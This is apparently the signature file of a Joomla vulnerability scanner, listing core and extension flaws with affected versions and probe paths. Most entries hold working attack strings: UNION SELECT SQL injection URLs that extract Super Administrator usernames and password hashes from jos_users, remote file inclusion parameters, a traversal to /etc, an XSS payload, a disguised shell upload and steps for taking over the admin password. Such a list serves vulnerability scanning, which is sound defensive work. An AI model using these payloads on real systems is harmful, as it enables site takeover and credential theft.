Generic: htaccess.txt has not been renamed. Versions Affected: Any|/htaccess.txt|Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Generic: Unprotected Administrator directory     Versions Affected:  Any|/administrator/|The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Generic: Guessable Administrator directory     Versions Affected:  Any|/admin/|The guessable /admin directory is detected. Attackers can bruteforce administrator accounts. How to protect: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Core: Multiple XSS/CSRF Vulnerability   Versions Affected: 1.5.9 <= |/?1.5.9-x|A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities.  
Core: JSession SSL Session Disclosure Vulnerability Versions effected: Joomla! 1.5.8 <= |/?1.5.8-x|When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session. 
Core: Frontend XSS Vulnerability Versions effected: 1.5.10 <=|/?1.5.10-x|Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Core:  Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.11 <=|/libraries/phpxmlrpc/xmlrpcs.php|/libraries/phpxmlrpc/xmlrpcs.php
Core:  Missing JEXEC Check - Path Disclosure Vulnerability Versions effected: 1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability Versions effected: 1.5.11 <=|/?1.5.11-x-http_ref|An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Core:  Frontend XSS - PHP_SELF not properly filtered Vulnerability Versions effected: 1.5.11 <=|/?1.5.11-x-php-s3lf|An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser. 
Core: Authentication Bypass Vulnerability Versions effected: Joomla!  1.5.3 <=|/administrator/|Backend accepts any password for custom Super Administrator when LDAP enabled
Core: Path Disclosure Vulnerability Versions effected: Joomla!  1.5.3 <=|/?1.5.3-path-disclose|Crafted URL can disclose absolute path
Core: User redirected Spamming Vulnerability Versions effected: Joomla!  1.5.3 <=|/?1.5.3-spam|User redirect spam
Core:  joomla.php RFI  Vulnerability Versions effected: 1.0.0 |/includes/joomla.php|/includes/joomla.php?includepath=
Core: Admin Backend Cross Site Request Forgery Vulnerability Versions effected: 1.0.13 <=|/administrator/|It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Core: Admin Backend Session Fixation SQL Injection Vulnerability Versions effected: Joomla! 1.0.12 <=|/?j1012-fixate-session|It is possible to manipulate administrator interface cookies, which may be used to impersonate a legitimate user, allowing the attacker to view or alter user records, and to perform transactions as that user. The Cookie variable can be set to a malicious and arbitrary value which can lead to session hijacking and privilege escalation attack.
Core: Path Disclosure Vulnerability Versions effected: Joomla!  1.5.12 <=|/libraries/joomla/utilities/compat/php50x.php|/libraries/joomla/utilities/compat/php50x.php
CorePlugin: Xstandard Editor X_CMS_LIBRARY_PATH Local Directory Traversal Vulnerability Versions effected: Joomla! 1.5.8  <=|/plugins/editors/xstandard/attachmentlibrary.php|Submit new header X_CMS_LIBRARY_PATH with value ../ to  /plugins/editors/xstandard/attachmentlibrary.php
CoreLibrary: g_pcltar_lib_dir Remote File Inclusion Vulnerability Versions effected: Joomla! 1.5.0 Beta|/libraries/pcl/pcltar.php|/libraries/pcl/pcltar.php?g_pcltar_lib_dir=
CoreTemplate:  ja_purity XSS Vulnerability Versions effected: 1.5.10 <=|/templates/ja_purity/|A XSS vulnerability exists in the JA_Purity template which ships with Joomla! 1.5.
CoreLibrary: phpmailer Remote Code Execution Vulnerability Versions effected: Joomla!  1.5.0 Beta/Stable|/libraries/phpmailer/phpmailer.php|N/A
CorePlugin: TinyMCE TinyBrowser addon multiple vulnerabilities Versions effected: Joomla! 1.5.12 |/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/|While Joomla! team announced only File Upload vulnerability, in fact there are many. See: http://www.milw0rm.com/exploits/9296
CoreComponent: Joomla Remote Admin Password Change  Vulnerability  Versions Affected: 1.5.5 <= |/components/com_user/controller.php|1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password 
CoreComponent: com_content SQL Injection Vulnerability    Version Affected:  Joomla! 1.0.0  <= |/components/com_content/|/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
CoreComponent: com_search Remote Code Execution Vulnerability   Version Affected:  Joomla! 1.5.0 beta 2 <= |/components/com_search/|/index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
CoreComponent: com_admin    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_admin/admin.admin.html.php|/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
CoreComponent: com_admin    File Inclusion Vulnerability     Versions Affected: N/A|/administrator/components/com_admin/admin.admin.html.php|/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
CoreComponent: MailTo SQL Injection Vulnerability Versions effected: N/A|/components/com_mailto/|/index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
CoreComponent: com_content Blind SQL Injection Vulnerability Versions effected: Joomla! 1.5.0 RC3|/components/com_content/|/index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
CoreComponent: com_content XSS Vulnerability    Version Affected:  Joomla!  1.5.7   <= |/components/com_content/|The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration. 
CoreComponent: com_weblinks  XSS Vulnerability    Version Affected:   Joomla! 1.5.7   <= |/components/com_weblinks/|[Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms). 
CoreComponent: com_mailto  Email Spam Vulnerability  Version Affected: Joomla!  1.5.6   <= |/components/com_mailto/|The mailto component does not verify validity of the URL prior to sending.
CoreComponent: com_content view=archive  SQL Injection Vulnerability  Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1|/components/com_content/|Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
CoreComponent: com_content XSS Vulnerability Version Affected: Joomla! 1.5.9 <=|/components/com_content/|A XSS vulnerability exists in the category view of com_content. 
CoreComponent: com_users XSS Vulnerability Version Affected: Joomla! 1.5.10 <=|/components/com_users/|A XSS vulnerability exists in the user view of com_users in the administrator panel.
CoreComponent:  com_installer CSRF Vulnerability Versions effected: Joomla! 1.5.0 Beta|/administrator/components/com_installer|N/A
CoreComponent:  com_search Memory Comsumption DoS Vulnerability Versions effected:  Joomla! 1.5.0 Beta|/components/com_search/|N/A
CoreComponent:  com_poll  (mosmsg) Memory Consumption DOS Vulnerability Versions effected: 1.0.7 <=|/components/com_poll/|Send request  /index.php?option=com_poll&task=results&id=14&mosmsg=DOS@HERE<<>AAA<><>
CoreComponent:  com_banners Blind SQL Injection Vulnerability Versions effected: N/A|/components/com_banners/|/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='1::/index.php?option=com_banners&task=archivesection&id=0'+and+'1'='2
CoreComponent:  com_mailto timeout Vulnerability Versions effected: 1.5.13 <=|/components/com_mailto/|[Requires a valid user account] In com_mailto, it was possible to bypass timeout protection against sending automated emails.
Component: A6MamboCredits   File Inclusion Vulnerability  Versions Affected: Any|/components/com_a6mambocredits/|/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
Component: A6MamboHelpDesk   File Inclusion Vulnerability  Versions Affected: Any |/components/com_a6mambohelpdesk/|/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Component: Advanced Poll 	  Versions Affected: 2.2.0 <= |/components/com_advancedpoll/|N/A
Component: Akocomment  SQL Injection Vulnerability  Versions Affected: Any |/components/com_akocomment/|Akocomment allows users to post comments to articles. $acname and $contentid are not sanitized and vulnerable. These correspond to hidden, value-prefilled FORM variables in the akocomment created html form.
Component: Article      File Inclusion Vulnerability    Versions Affected: 1.1 <= |/components/com_articles/|/classes/html/com_articles.php?absolute_path=
Component: ArtLinks File Inclusion Vulnerability    Versions Affected: Any|/components/com_artlinks/|/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
Component: MamCom (com_trade)    Versions Affected: Any |/components/com_trade/|N/A
Component: Bayesian Naive Filter 	File Inclusion Vulnerability  Versions Affected: 1.1 <= |/components/com_bayesiannaivefilter/|/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
Component: BigApe Backup   File Inclusion Vulnerability    Versions Affected: <= |/components/com_babackup/|/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=
Component: BSQ Site Stats  XSS + SQL Injection Vulnerabilities	 Versions Affected: 2.2.1 <= |/components/com_bsqsitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed.  2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  Successful exploitation requires that "magic_quotes_gpc" is disabled. 
Component: Car Manager  SQL Injection Vulnerability    Versions Affected: 1.1 <= |/components/com_resman/|/index.php?option=com_resman&task=moreinfo&id=-1+UNION+SELECT+111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Classifieds 	Versions Affected: 1.3 <= |/components/com_classifieds/|N/A
Component: Colophon  File Inclusion Vulnerability    Versions Affected: 1.2 <= |/components/com_colophon/|/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Component: Community Builder  SQL Injection Vulnerability  Versions Affected: 1.0.0 <= |/components/com_profiler/|/index.php?option=com_profile&Itemid=42&task=&task=viewoffer&oid=9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Events 	  Versions Affected: 1.3 Beta <= |/components/com_events/|N/A
Component: Expose Flash Gallery  Remote Permission Bypass/Arbitrary File Upload Vulnerability Versions Affected: RC4 <= |/components/com_expose/uploadimg.php|Upload shell.php.jpg to /components/com_expose/uploadimg.php or /administrator/com_expose/uploadimg.php. Check your shell at /components/com_expose/expose/img/shell.php.jpg or /administrator/...
Component: ExtCalendar  XSS Vulnerability	Versions Affected: 0.9.1 <= |/components/com_extcalendar/|1) Input passed to the "month", "year", "prev", and "next" parameters in calendar.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "Event title" field when adding a new event isn't properly sanitised before being used. This can be exploited to inject arbitrary HTML and script code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed (e.g. when the administrator logs in).
Component: Facile Forms SQL Injection Vulnerability  Versions Affected: 1.4.6 <= |/components/com_facileforms/|/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Galleria   File Inclusion Vulnerability     Versions Affected: Any |/components/com_galleria/galleria.html.php|/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
Component: Gmaps    SQL Injection Vulnerability	   Versions Affected: 1.01 <= |/components/com_gmaps/|/index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Hash Cash 	File Inclusion Vulnerability Versions Affected: Any |/components/com_hashcash/server.php|/components/com_hashcash/server.php?mosConfig_absolute_path=
Component: Hot Property    Versions Affected: 0.97 <= |/components/com_hotproperty/|N/A
Component: JCE  XSS+File Inclusion Vulnerability	Versions Affected: 1.0.4<= |/components/com_jce/|1) Input passed to the "img", "title", "w", and "h" parameters within jce.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.  2) Input passed to the "plugin" and "file" parameters within jce.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources. 
Component: JoomlaPack       File Inclusion Vulnerability     Versions Affected: 1.0.4a2 RE <= |/components/com_jpack/|/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
Component: JoomlaBoard     File Inclusion Vulnerability   	Versions Affected: 1.1.1 <= |/components/com_joomlaboard/|/components/com_joomlaboard/file_upload.php?sbp=
Component: JoomlaLib 	Versions Affected: 1.2.1 <= |/components/com_joomlalib/|N/A
Component: JD-WordPress 	Versions Affected: 1.0 RC2 <= |/components/com_jd-wp/|N/A
Component: Fundraiser 	Versions Affected: 0.0.0 <= |/components/com_fundraiser/|N/A
Component: Marketplace    SQL Injection Vulnerability	Versions Affected: 1.1.1-pl1 <= |/components/com_marketplace/|/index.php?option=com_marketplace&page=show_category&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoReferences 	  SQL Injection Vulnerability  Versions Affected: 1.3.1 <= |/components/com_neoreferences/|/index.php?option=com_neoreferences&Itemid=27&catid=99887766+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+where+user_id=1=1--
Component: CHRONOContact File Inclusion Vulnerability Versions Affected: N/A|/components/com_chronocontact/excelwriter/PPS/File.php|/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Component: MamboSPGM 	Versions Affected: 1.4.1 <= |/components/com_mambospgm/|N/A
Component: Ajax Chat 	Versions Affected: 1.0.1 <= |/components/com_ajaxchat/|N/A
Component: Joomla Cloner   Versions Affected: 1.6.1 <= |/components/com_cloner/|N/A
Component: Quiz   SQL Injection Vulnerability 	Versions Affected: 0.81 <= |/components/com_quiz/|/index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MCQuiz    SQL Injection Vulnerability	Versions Affected: 0.9 <= |/components/com_mcquiz/|/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=42&tid=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: paxxgallery    Blind SQL Injection  Vulnerability Versions Affected: 0.2 <= |/components/com_paxxgallery/|/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=1::/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid=1&task=view&iid=1+and+1=2
Component: pcchess   File Inclusion Vulnerability	Versions Affected: 0.8 <= |/components/com_pcchess/include.pcchess.php|/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
Component: xfaq 	SQL Injection Vulnerability Versions Affected: 1.2 <= |/components/com_xfaq/|/index.php?option=com_xfaq&task=answer&Itemid=27&catid=97&aid=-9988+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: rapidrecipe SQL injection Vulnerability	Versions Affected: 1.6.5 <= |/components/com_rapidrecipe/|/index.php?option=com_rapidrecipe&page=viewrecipe&recipe_id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_doc  SQL Injection Vulnerability	Versions Affected: Any ]|/components/com_doc/|/index.php?option=com_doc&task=view&sid=-1+UNION+SELECT+1,1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,5,6,7,8,password,username,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Unknown name: com_noticias   SQL Injection Vulnerability 	Versions Affected: Any |/components/com_noticias/|index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766+UNION++SELECT+0,concat(username,0x3a,password,0x3a,email),2,3,4,5++FROM++jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoGallery   SQL Injection Vulnerability	Versions Affected: Any |/components/com_neogallery/|/index.php?option=com_neogallery&task=show&Itemid=5&catid=999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Ynews 	  SQL Injection Vulnerability	Versions Affected: 1.0.0 <= |/components/com_ynews/|/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+UNION+SELECT+0,1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: jooget   SQL Injection Vulnerability 	Versions Affected: 2.6.8 <= |/components/com_jooget/|/index.php?option=com_jooget&Itemid=61&task=detail&id=-1+UNION+SELECT+0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MediaSlide Blind SQL Injection Vulnerability Versions Affected: 0.5.0 <= |/components/com_mediaslide/|/index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=1::/index.php?option=com_mediaslide&act=contact&id=1&albumnum=1+and+1=2
Component: Rssxt  RFI Vulnerability Versions Affected: 1.0 <= |/components/com_rssxt/|/components/com_rssxt/rssxt.php?mosConfig_absolute_path=
Component: D4JeZine 	Versions Affected: 2.8 <= |/components/com_ezine/|N/A
Component: ProductShowcase SQL Injection Vulnerability Versions Affected: 1.5 <= |/components/com_productshowcase/|/index.php?option=com_productshowcase&Itemid=1&action=details&id=-99999+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,1,1,1,1,2,3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Candle	 SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_candle/|/index.php?option=com_candle&task=content&cID=-9999+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: simple shop  SQL Injection Vulnerability Versions Affected: 2.0 <= |/components/com_simpleshop/|/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: hwdVideoShare SQL Injection Vulnerability Versions Affected: 1.1.1 <= |/components/com_hwdvideoshare/|/index.php?option=com_hwdvideoshare&func=viewcategory&Itemid=61&cat_id=-9999999+UNION+SELECT+000,111,222,333,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,1,2,2,2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Clasifier  SQL Injection Vulnerability Versions Affected: 0.9 <= |/components/com_clasifier/|/index.php?option=com_clasifier&Itemid=61&cat_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PC CookBook   SQL Injection Vulnerability 	Versions Affected: 1.3 <= |/components/com_pccookbook/|/index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: astatsPRO   SQL Injection Vulnerability	Versions Affected: 1.0.0 <= |/components/com_astatspro/|/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_galeria   SQL Injection Vulnerability 	Versions Affected: Any|/components/com_galeria/|/index.php?option=com_galeria&Itemid=61&func=detail&id=-999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,7+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Limbo File Manager com_fm RFI Vulnerability  Versions Affected: 1.0.4 <= |/components/com_fm/fm.install.php|/components/com_fm/fm.install.php?lm_absolute_path=
Component: Serverstat 	  File Inclusion Vulnerability	 Versions Affected: 0.4.4 <= |/components/com_serverstat/install.serverstat.php|/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Component: Com Profiler Blind SQL Injection	Vulnerability Versions Affected: 1.0 RC2 <=|/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Component: Crop Image  File Inclusion Vulnerability 	Versions Affected: 1.0 <= |/components/com_cropimage/admin.cropcanvas.php|/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Component: Mambatstaff    File Inclusion Vulnerability   Versions Affected: 3.1b <= |/components/com_mambatstaff/mambatstaff.php|/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
Component: Loudmouth 	Versions Affected: 4.0 j <= |/components/com_loudmouth/|N/A
Component: PhpBB RFI Vulnerability Versions Affected: 1.2.4RC3 <= |/components/com_forum/|/components/com_forum/download.php?phpbb_root_path=
Component: Kochsuite    File Inclusion Vulnerability    	Versions Affected: 0.9.4 <= |/components/com_kochsuite /|/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Component: Remository   File Inclusion Vulnerability		Versions Affected: 3.25 <= |/components/com_remository/admin.remository.php|/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Component: Tosmo Mambo RFI Vulnerability Versions Affected: 4.0.13a <= |/components/com_minibb/|/components/minibb/index.php?absolute_path=
Component: Mam - Moodle 	  File Inclusion Vulnerability   Versions Affected: Any|/components/com_moodle/moodle.php|/components/com_moodle/moodle.php?mosConfig_absolute_path=
Component: Coppermine Photo Gallery 	  File Inclusion Vulnerability	 Versions Affected: 1.0 <= |/components/com_cpg/cpg.php|/components/com_cpg/cpg.php?mosConfig_absolute_path=
Component: Php Shop 	  File Inclusion Vulnerability	 Versions Affected: 1.2 RC2b <= |/components/com_phpshop/toolbar.phpshop.html.php|/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Component: MamboWiki      File Inclusion Vulnerability	Versions Affected: 0.9.6 <= |/components/com_mambowiki/MamboLogin.php|/components/com_mambowiki/MamboLogin.php?IP=
Component: Lurm Constructor   File Inclusion Vulnerability	Versions Affected: 0.6b <= |/components/com_lurm_constructor/admin.lurm_constructor.php|/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Component: FlippingBook SQL Injection Vulnerability Versions Affected: 1.0.4 <= |/components/com_flippingbook/|/index.php?option=com_flippingbook&Itemid=28&book_id=999+UNION+SELECT+null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: eXtplorer Local Directory Traversal Vulnerability Versions Affected: 2.0.0 RC2 <= |/components/com_extplorer/|/index.php?com_extplorer-test1
Component: joomlaXplorer Local Directory Traversal  Vulnerability Versions Affected: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc
Component: joomlaXplorer XSS Vulnerability Versions Affected: 1.6.2 <= |/components/com_joomlaxplorer/|/index.php?option=com_joomlaxplorer&action=show_error&dir=hsmx&order=name&srt=yes&error=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
Component: Online FlashQuiz   Remote File Inclusion Vulnerability Versions Affected: 1.0.2 <= |/components/com_onlineflashquiz/|/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=
Component: actualite   SQL Injection 	Vulnerability Versions Affected: 1.0 <= |/components/com_actualite/|/index.php?option=com_actualite&task=edit&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: myalbum  SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_myalbum/|/index.php?option=com_myalbum&album=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2,3,4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: alphacontent   SQL Injection  Vulnerability  Versions Affected: 2.5.8 <= |/components/com_alphacontent/|/index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999+UNION+SELECT+1,concat(username,0x3e,password),3,4,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,39+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Cinema SQL Injection Vulnerability  	Versions Affected: 1.0 <= |/components/com_cinema/|/index.php?option=com_cinema&Itemid=1&func=detail&id=-99999+UNION+SELECT+0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: D3000 	SQL Injection Vulnerability  Versions Affected: 1.0.0 <= |/components/com_d3000/|/index.php?option=com_d3000&task=showarticles&id=-99999+UNION+SELECT+0,username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: rekry 	SQL Injection Vulnerability Versions Affected: 1.0.0 <= |/components/com_rekry/|/index.php?option=com_rekry&Itemid=60&rekryview=view&op_id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+limit+1,1--
Component: custompages Remote File Inclusion Vulnerability  Versions Affected: 1.1 <= |/components/com_custompages/|/index.php?option=com_custompages&cpage=
Component: Restaurante  File Upload Vulnerability   Versions Affected: 1.0 <= |/components/com_restaurante/|/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Alberghi  SQL Injection Vulnerability Versions Affected: 2.1.3 <= |/components/com_alberghi/|/index.php?option=com_alberghi&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: joovideo   SQL Injection	Vulnerability Versions Affected: 1.2.2 <= |/components/com_joovideo/|/index.php?option=com_joovideo&Itemid=1&task=detail&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Acajoom  SQL Injection Vulnerability  Versions Affected: 1.1.5 <= |/components/com_acajoom/|/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72+LIMIT+1,1--
